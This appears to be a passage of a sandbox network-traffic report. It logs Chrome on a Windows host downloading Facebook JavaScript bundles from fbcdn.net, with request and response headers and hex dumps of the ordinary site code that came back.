                                                                                                                                                                                                                                  58192.168.2.649785157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC581OUTGET /rsrc.php/v3/yT/r/DHWoESmf_2P.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: BOsB5wO8Yj0/bkLXEdvZCA==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 08:42:58 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: w7W3bXyTeVnT1AG/yg7RXSETnreb2E5vQHXULlzwXltOUq2X61YSlCH7plE4gNUdK5oaTCj6Cab8Z74mHFiU2w==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 82019
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 4e 65 63 74 61 72 22 2c 5b 22 45 6e 76 22 2c 22 67 65 74 43 6f 6e 74 65 78 74 75 61 6c 50 61 72 65 6e 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 76 61 72 20 67 3b 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 61 2e 6e 63 74 72 7c 7c 28 61 2e 6e 63 74 72 3d 7b 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 69 66 28 28 67 7c 7c 28 67 3d 62 28 22 45 6e 76 22 29 29 29 2e 6d 6f 64 75 6c 65 7c 7c 21 61 29 72 65 74 75 72 6e 28 67 7c 7c 28 67 3d 62 28 22 45 6e 76 22 29 29 29 2e 6d 6f 64 75 6c 65 3b 76 61 72 20 63 3d 7b 66 62 70 61 67 65 5f 66 61 6e 5f 63 6f 6e 66 69 72 6d 3a 21 30 2c 70 68 6f 74 6f 73 5f 73 6e 6f 77 6c 69 66 74 3a 21 30 7d 2c 64 3b 77 68 69
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("Nectar",["Env","getContextualParent"],(function(a,b,c,d,e,f){var g;function h(a){a.nctr||(a.nctr={})}function i(a){if((g||(g=b("Env"))).module||!a)return(g||(g=b("Env"))).module;var c={fbpage_fan_confirm:!0,photos_snowlift:!0},d;whi
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 39 31 3b 74 68 69 73 2e 68 5b 31 5d 2b 3d 64 3b 64 3d 74 68 69 73 2e 68 5b 31 5d 3e 3e 3e 31 33 3b 74 68 69 73 2e 68 5b 31 5d 26 3d 38 31 39 31 3b 74 68 69 73 2e 68 5b 32 5d 2b 3d 64 3b 63 5b 30 5d 3d 74 68 69 73 2e 68 5b 30 5d 2b 35 3b 64 3d 63 5b 30 5d 3e 3e 3e 31 33 3b 63 5b 30 5d 26 3d 38 31 39 31 3b 66 6f 72 28 65 3d 31 3b 65 3c 31 30 3b 65 2b 2b 29 63 5b 65 5d 3d 74 68 69 73 2e 68 5b 65 5d 2b 64 2c 64 3d 63 5b 65 5d 3e 3e 3e 31 33 2c 63 5b 65 5d 26 3d 38 31 39 31 3b 63 5b 39 5d 2d 3d 31 3c 3c 31 33 3b 64 3d 28 64 5e 31 29 2d 31 3b 66 6f 72 28 65 3d 30 3b 65 3c 31 30 3b 65 2b 2b 29 63 5b 65 5d 26 3d 64 3b 64 3d 7e 64 3b 66 6f 72 28 65 3d 30 3b 65 3c 31 30 3b 65 2b 2b 29 74 68 69 73 2e 68 5b 65 5d 3d 74 68 69 73 2e 68 5b 65 5d 26 64 7c 63 5b 65 5d 3b
                                                                                                                                                                                                                                  Data Ascii: 91;this.h[1]+=d;d=this.h[1]>>>13;this.h[1]&=8191;this.h[2]+=d;c[0]=this.h[0]+5;d=c[0]>>>13;c[0]&=8191;for(e=1;e<10;e++)c[e]=this.h[e]+d,d=c[e]>>>13,c[e]&=8191;c[9]-=1<<13;d=(d^1)-1;for(e=0;e<10;e++)c[e]&=d;d=~d;for(e=0;e<10;e++)this.h[e]=this.h[e]&d|c[e];
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 74 72 65 61 6d 5f 73 61 6c 73 61 32 30 5f 78 6f 72 3a 77 2c 63 72 79 70 74 6f 5f 73 74 72 65 61 6d 5f 73 61 6c 73 61 32 30 3a 78 2c 63 72 79 70 74 6f 5f 6f 6e 65 74 69 6d 65 61 75 74 68 3a 42 2c 63 72 79 70 74 6f 5f 6f 6e 65 74 69 6d 65 61 75 74 68 5f 76 65 72 69 66 79 3a 43 2c 63 72 79 70 74 6f 5f 76 65 72 69 66 79 5f 31 36 3a 70 2c 63 72 79 70 74 6f 5f 76 65 72 69 66 79 5f 33 32 3a 71 2c 63 72 79 70 74 6f 5f 73 65 63 72 65 74 62 6f 78 3a 44 2c 63 72 79 70 74 6f 5f 73 65 63 72 65 74 62 6f 78 5f 6f 70 65 6e 3a 45 2c 63 72 79 70 74 6f 5f 73 63 61 6c 61 72 6d 75 6c 74 3a 53 2c 63 72 79 70 74 6f 5f 73 63 61 6c 61 72 6d 75 6c 74 5f 62 61 73 65 3a 54 2c 63 72 79 70 74 6f 5f 62 6f 78 5f 62 65 66 6f 72 65 6e 6d 3a 56 2c 63 72 79 70 74 6f 5f 62 6f 78 5f 61 66 74
                                                                                                                                                                                                                                  Data Ascii: tream_salsa20_xor:w,crypto_stream_salsa20:x,crypto_onetimeauth:B,crypto_onetimeauth_verify:C,crypto_verify_16:p,crypto_verify_32:q,crypto_secretbox:D,crypto_secretbox_open:E,crypto_scalarmult:S,crypto_scalarmult_base:T,crypto_box_beforenm:V,crypto_box_aft
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 6d 6f 7a 46 75 6c 6c 53 63 72 65 65 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 6d 73 46 75 6c 6c 73 63 72 65 65 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 66 75 6c 6c 73 63 72 65 65 6e 45 6e 61 62 6c 65 64 3b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 62 7c 7c 61 2e 77 65 62 6b 69 74 43 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 6d 6f 7a 43 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 6d 73 45 78 69 74 46 75 6c 6c 73 63 72 65 65 6e 7c 7c 61 2e 63 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 65 78 69 74 46 75 6c 6c 53 63 72 65 65 6e 29 7d 3b 72 65 74 75 72 6e 20 62 7d 28 63 28 22 6d 69 78 69 6e 22 29 28 63 28 22 41 72 62 69 74 65 72 4d 69 78 69 6e 22 29 29 29 3b 62 3d 6e 65 77 20 61 28 29 3b 65
                                                                                                                                                                                                                                  Data Ascii: nEnabled||a.mozFullScreenEnabled||a.msFullscreenEnabled||a.fullscreenEnabled;return Boolean(b||a.webkitCancelFullScreen||a.mozCancelFullScreen||a.msExitFullscreen||a.cancelFullScreen||a.exitFullScreen)};return b}(c("mixin")(c("ArbiterMixin")));b=new a();e
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1500INData Raw: 62 29 7b 74 68 69 73 2e 24 31 3d 61 2c 74 68 69 73 2e 24 32 3d 62 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 67 65 74 55 52 49 42 75 69 6c 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 68 69 73 2c 64 3d 6e 65 77 28 63 28 22 58 43 6f 6e 74 72 6f 6c 6c 65 72 55 52 49 42 75 69 6c 64 65 72 22 29 29 28 74 68 69 73 2e 24 31 2c 74 68 69 73 2e 24 32 29 3b 69 66 28 61 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 67 65 74 52 65 71 75 65 73 74 28 61 29 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 68 69 73 2e 24 32 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 62 2e 24 32 5b 61 5d 2c 66 3d 22 22 3b 21 63 2e 72 65 71 75 69 72 65 64 26 26 21 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61
                                                                                                                                                                                                                                  Data Ascii: b){this.$1=a,this.$2=b}var b=a.prototype;b.getURIBuilder=function(a){var b=this,d=new(c("XControllerURIBuilder"))(this.$1,this.$2);if(a){var e=this.getRequest(a);Object.keys(this.$2).forEach(function(a){var c=b.$2[a],f="";!c.required&&!Object.prototype.ha
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC15495INData Raw: 22 52 65 6c 6f 61 64 50 61 67 65 22 29 2e 6e 6f 77 28 29 7d 29 2e 73 65 6e 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 5c 78 61 30 22 2c 22 67 22 29 2c 22 26 6e 62 73 70 3b 22 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 26 6e 62 73 70 3b 22 2c 22 67 22 29 2c 22 5c 78 61 30 22 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 61 29 7b 6e 65 77 28 63 28 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 29 29 28 29 2e 73 65 74 55 52 49 28 69 29 2e 73 65 74 44 61 74 61 28 7b 72 6d 6f 64 65 3a 61 7d 29 2e 73 65 74 48 61 6e 64 6c 65 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 22 52 65 6c 6f 61
                                                                                                                                                                                                                                  Data Ascii: "ReloadPage").now()}).send()}function b(a){return a.replace(new RegExp("\xa0","g"),"&nbsp;")}function e(a){return a.replace(new RegExp("&nbsp;","g"),"\xa0")}function f(a){new(c("AsyncRequest"))().setURI(i).setData({rmode:a}).setHandler(function(){d("Reloa


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  59192.168.2.649786157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC374OUTGET /rsrc.php/v3/yM/r/7QNyOKeJP6X.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: GkBFaqN6ASU6ymlIG8mrvA==
                                                                                                                                                                                                                                  Expires: Wed, 24 Sep 2025 20:57:11 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: hhMr9O0yOP8KyW4W0LnGKpHWbwIqPOFKXNG7Oh00HkcdojqU+oHZIlrJjdDUon30Z9geDDcOoB/yJ9Fw16QmIQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 49907
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 4c 6f 67 69 6e 46 6f 72 6d 54 6f 67 67 6c 65 22 2c 5b 22 63 78 22 2c 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 67 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 76 61 72 20 65 3d 63 28 22 67 65 22 29 28 22 70 61 73 73 22 29 3b 64 28 22 43 53 53 22 29 2e 68 69 64 65 28 61 29 3b 45 76 65 6e 74 2e 6c 69 73 74 65 6e 28 65 2c 22 6b 65 79 75 70 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 53 74 72 69 6e 67 28 65 2e 76 61 6c 75 65 29 3b 63 2e 6c 65 6e 67 74 68 21 3d 3d 30 3f 28 64 28 22 43 53 53 22 29 2e 73 68 6f 77 28 61 29 2c 64 28 22 43 53 53 22 29 2e
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("LoginFormToggle",["cx","CSS","DOM","ge"],(function(a,b,c,d,e,f,g,h){"use strict";function a(a,b){var e=c("ge")("pass");d("CSS").hide(a);Event.listen(e,"keyup",function(){var c=String(e.value);c.length!==0?(d("CSS").show(a),d("CSS").
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 45 3a 37 32 30 2c 46 41 49 4c 5f 46 41 4c 53 45 5f 4e 45 47 41 54 49 56 45 3a 37 32 31 2c 41 50 50 5f 43 52 41 53 48 3a 37 32 32 2c 54 45 53 54 5f 47 49 4e 44 49 3a 37 32 33 2c 54 54 54 54 3a 37 32 34 2c 42 55 47 5f 42 41 53 48 5f 41 43 54 49 4f 4e 3a 37 32 35 2c 42 55 47 5f 42 41 53 48 5f 54 45 53 54 3a 37 32 36 2c 49 4e 49 54 5f 4d 4f 42 49 4c 45 5f 43 4f 4e 46 49 47 3a 37 32 37 2c 53 55 43 43 45 53 53 5f 57 49 54 48 5f 56 43 5f 44 49 53 41 42 4c 45 44 3a 31 30 30 38 2c 44 45 4c 45 54 45 5f 52 45 43 4f 52 44 3a 31 31 31 35 2c 4e 4f 52 4d 41 4c 5f 53 45 41 52 43 48 5f 4c 45 41 56 45 3a 31 31 37 31 2c 4d 41 57 5f 53 48 49 4d 5f 49 4e 44 45 58 45 44 44 42 5f 53 45 54 55 50 3a 31 33 33 32 2c 4d 41 57 5f 46 54 53 5f 49 4e 44 45 58 45 44 44 42 5f 53 45 54 55
                                                                                                                                                                                                                                  Data Ascii: E:720,FAIL_FALSE_NEGATIVE:721,APP_CRASH:722,TEST_GINDI:723,TTTT:724,BUG_BASH_ACTION:725,BUG_BASH_TEST:726,INIT_MOBILE_CONFIG:727,SUCCESS_WITH_VC_DISABLED:1008,DELETE_RECORD:1115,NORMAL_SEARCH_LEAVE:1171,MAW_SHIM_INDEXEDDB_SETUP:1332,MAW_FTS_INDEXEDDB_SETU
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 72 5f 69 64 3a 28 68 7c 7c 28 68 3d 64 28 22 51 50 4c 45 76 65 6e 74 22 29 29 29 2e 67 65 74 4d 61 72 6b 65 72 49 64 28 61 29 2c 61 63 74 69 6f 6e 5f 69 64 3a 35 31 2c 69 6e 73 74 61 6e 63 65 5f 69 64 3a 30 2c 73 61 6d 70 6c 65 5f 72 61 74 65 3a 6b 2c 6d 65 74 68 6f 64 3a 6d 2e 67 65 74 28 65 29 2c 64 61 5f 74 79 70 65 3a 62 2c 64 61 5f 6c 65 76 65 6c 3a 63 2c 6d 65 74 61 64 61 74 61 3a 7b 61 70 70 6c 69 63 61 74 69 6f 6e 5f 61 6e 61 6c 79 74 69 63 73 3a 7b 74 69 6d 65 5f 73 69 6e 63 65 5f 71 70 6c 5f 6d 6f 64 75 6c 65 5f 69 6e 69 74 3a 67 2d 74 68 69 73 2e 24 31 2e 6d 6f 64 75 6c 65 4c 6f 61 64 54 69 6d 65 73 74 61 6d 70 7d 7d 2c 6d 61 72 6b 65 72 5f 74 79 70 65 3a 31 2c 66 6c 61 67 73 3a 31 7d 3b 74 68 69 73 2e 24 31 33 28 6c 28 6b 2c 66 29 29 7d 3b 62
                                                                                                                                                                                                                                  Data Ascii: r_id:(h||(h=d("QPLEvent"))).getMarkerId(a),action_id:51,instance_id:0,sample_rate:k,method:m.get(e),da_type:b,da_level:c,metadata:{application_analytics:{time_since_qpl_module_init:g-this.$1.moduleLoadTimestamp}},marker_type:1,flags:1};this.$13(l(k,f))};b
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1266INData Raw: 67 69 6e 49 6e 69 74 69 61 6c 4c 6f 61 64 4c 6f 67 67 65 72 22 2c 5b 22 51 75 69 63 6b 4c 6f 67 41 63 74 69 6f 6e 54 79 70 65 22 2c 22 51 75 69 63 6b 50 65 72 66 6f 72 6d 61 6e 63 65 4c 6f 67 67 65 72 22 2c 22 52 75 6e 22 2c 22 71 70 6c 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 31 2c 6a 3d 32 3b 61 3d 7b 6f 6e 4c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 68 7c 7c 28 68 3d 63 28 22 51 75 69 63 6b 50 65 72 66 6f 72 6d 61 6e 63 65 4c 6f 67 67 65 72 22 29 29 29 2e 6d 61 72 6b 65 72 53 74 61 72 74 46 72 6f 6d 4e 61 76 53 74 61 72 74 28 63 28 22 71 70 6c 22 29 2e 5f 28 32 35 30 33 35 30 36 31 37 2c 22 32 34 34 34 22 29 2c 69 29 3b 76 61 72 20 62 3d
                                                                                                                                                                                                                                  Data Ascii: ginInitialLoadLogger",["QuickLogActionType","QuickPerformanceLogger","Run","qpl"],(function(a,b,c,d,e,f,g){"use strict";var h,i=1,j=2;a={onLoad:function(a){(h||(h=c("QuickPerformanceLogger"))).markerStartFromNavStart(c("qpl")._(250350617,"2444"),i);var b=


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  60192.168.2.649788157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC374OUTGET /rsrc.php/v3/y-/r/C5TXdJzIETO.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: ZXUSaTUvXH/z41yDoCXizg==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 22:34:38 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: l39/0X1oahIXIxgLwctOpR/vUwS0A2RGzF3NzHfNfBktiBHltTv34qgZUSKZL15FfPYF9PrmsOSVka19sl9nog==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:21 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 4295
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC4294INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 58 44 4f 4d 53 63 61 6e 6e 65 72 52 65 73 75 6c 74 73 43 6f 6e 74 72 6f 6c 6c 65 72 52 6f 75 74 65 42 75 69 6c 64 65 72 22 2c 5b 22 6a 73 52 6f 75 74 65 42 75 69 6c 64 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 61 3d 63 28 22 6a 73 52 6f 75 74 65 42 75 69 6c 64 65 72 22 29 28 22 2f 73 68 61 72 65 64 2f 75 73 65 72 5f 70 72 65 66 65 72 65 6e 63 65 73 2f 22 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 7d 29 2c 76 6f 69 64 20 30 29 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 44 4f 4d 53 63 61 6e 6e 65 72 22 2c 5b 22 42 61 73 65 36 34 22 2c 22 43 6f 6e 73 74 55 72 69 55 74 69 6c 73 22 2c 22
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("XDOMScannerResultsControllerRouteBuilder",["jsRouteBuilder"],(function(a,b,c,d,e,f,g){a=c("jsRouteBuilder")("/shared/user_preferences/",Object.freeze({}),void 0);b=a;g["default"]=b}),98);__d("DOMScanner",["Base64","ConstUriUtils","


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
